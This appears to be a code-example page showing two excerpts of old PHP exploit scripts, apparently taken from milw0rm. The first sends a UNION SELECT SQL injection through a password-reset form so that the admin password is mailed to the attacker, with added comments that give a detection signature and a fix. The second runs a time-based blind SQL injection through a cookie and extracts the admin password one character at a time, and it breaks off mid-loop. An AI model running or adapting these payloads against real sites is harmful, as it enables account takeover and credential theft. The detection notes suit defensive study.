Beispiel #1
        $port = str_replace("-p", "", $argv[$i]);
    }
    if ($temp == "-P") {
        $proxy = str_replace("-P", "", $argv[$i]);
    }
}
// Build the request target. When a proxy was given on the command line the
// request line carries an absolute URI (scheme://host:port/path, the form a
// proxy expects); otherwise only the path is used. Note the loose `!=`
// comparison: a proxy value of "0" would also be treated as "no proxy".
if ($proxy != '') {
    $p = "http://" . $host . ":" . $port . $path;
} else {
    $p = $path;
}
// SQL-injection payload that is sent as the `loginForm` value: the leading
// quote closes the original string literal, the UNION SELECT appends a row
// built from `members` id=1 (the password column is embedded in a label text
// together with $your_email), and the trailing `/*` comments out the rest of
// the original query. The number of selected columns presumably mirrors the
// target query's column list — cannot be confirmed from this excerpt.
// From a defender's view this is the signature to alert on: a POST to
// general/sendpassword.php?action=send whose loginForm field contains a quote
// followed by UNION SELECT or a `/*` marker; the fix on the server side is a
// parameterised query (or strict validation) for the login name.
$sql = "'UNION SELECT id,1,CONCAT('this is the real password (encrypted with md5()";
$sql .= ",crypt() or in plain text): ',password),password,name,title,'" . $your_email;
$sql .= "',null,'','','','',null,1,'2006-03-27 20:48',0,'administration/admin.php',";
$sql .= "'','',null FROM members mem WHERE id=1/*";
// Form-encode the payload so it survives the application/x-www-form-urlencoded body.
$sql = urlencode($sql);
$data = "loginForm=" . $sql;
// Raw HTTP/1.0 POST assembled by hand rather than via an HTTP client.
// Content-Length is strlen(), i.e. a byte count, which is what the header requires.
$packet = "POST " . $p . "general/sendpassword.php?action=send HTTP/1.0\r\n";
$packet .= "Host: " . $host . "\r\n";
$packet .= "Content-Type: application/x-www-form-urlencoded\r\n";
$packet .= "Content-Length: " . strlen($data) . "\r\n";
$packet .= "Connection: Close\r\n\r\n";
$packet .= $data;
#debug
// quick_dump() and sendpacketii() are defined elsewhere in the file (not shown here).
echo quick_dump($packet);
sendpacketii($packet);
// What the password-reset mailer actually sends is not visible in this excerpt;
// the script only assumes the injected row reaches the mailbox at $your_email.
echo "Now check your mailbox...";
?>

# milw0rm.com [2006-03-28]
Beispiel #2
// Drop any NUL bytes from the admin name obtained earlier (outside this span),
// print it, then initialise the state used by the loop that follows:
// an empty password buffer and $j as the 1-based character position.
$admin = str_replace("\0", '', $admin);
echo "admin -> {$admin}\r\n";
$password = '';
$j = 1;
while (!strstr($password, chr(0))) {
    for ($i = 0; $i <= 255; $i++) {
        $starttime = time();
        echo "starttime -> " . $starttime . "\r\n";
        $sql = "99999 UNION SELECT IF((ASCII(SUBSTRING(password," . $j . ",1))=" . $i . ") & 1, benchmark(50000000,CHAR(0)),0) FROM " . $prefix . "users WHERE username="******" ", "/**/", $sql);
        $sql = urlencode($sql);
        $packet = "GET " . $p . "index.php?shard=blog&action=proc_reply HTTP/1.0\r\n";
        $packet .= "Host: " . $host . "\r\n";
        $packet .= "Cookie: ID=" . $sql . ";\r\n";
        $packet .= "Connection: Close\r\n\r\n";
        echo quick_dump($packet) . "\r\n";
        sendpacketii($packet);
        $endtime = time();
        echo "endtime -> " . $endtime . "\r\n";
        $difftime = $endtime - $starttime;
        echo "difftime -> " . $difftime . "\r\n";
        if ($difftime > 5) {
            $password .= chr($i);
            echo "password -> " . $password . "[???]\r\n";
            sleep(2);
            break;
        }
        if ($i == 255) {
            die("Exploit failed...we have an admin user in 'permissiongroups' table, but for some reason there is not a '" . $admin . "' user in 'users' one...");
        }
    }